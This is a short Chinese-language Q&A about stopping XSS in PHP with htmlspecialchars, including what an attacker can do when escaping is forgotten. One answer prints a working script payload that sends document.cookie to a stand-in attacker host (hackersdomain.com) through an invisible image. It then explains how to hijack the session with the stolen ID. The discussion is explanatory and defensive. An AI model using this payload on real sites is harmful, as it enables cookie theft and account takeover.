因此,防止网站受到XSS攻击非常简单,你只需要使用htmlspecialchars功能就可以了.
但如果开发人员忘记使用它,攻击者/黑客可以做些什么呢?他可以得到你的session_id,对吗?这是一个问题.他能做些什么呢?
非常感谢你.
因此,防止网站受到XSS攻击很简单,你只需要使用htmlspecialchars功能就可以了.
对.当您要重新显示用户控制的输入时,可以在任何地方使用它.这涉及HTTP请求的所有部分:标题,正文和参数.
但如果开发人员忘记使用它,攻击者/黑客可以做些什么呢?
他/她可以插入一些恶意HTML /脚本.例如,以下是网页上的一些消息/评论:
<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>
以上将从mailicious域请求图像以及文档cookie作为查询字符串.
他可以得到你的session_id,对吗?这是一个问题.他能做些什么呢?
会话ID存储在cookie中.一旦黑客被告知已经使用查询字符串中的cookie请求了图像,他/她所要做的就是编辑浏览器的cookie以包含相同的会话ID以便以原始用户身份登录.如果原始用户是站点管理员,这显然是非常危险的.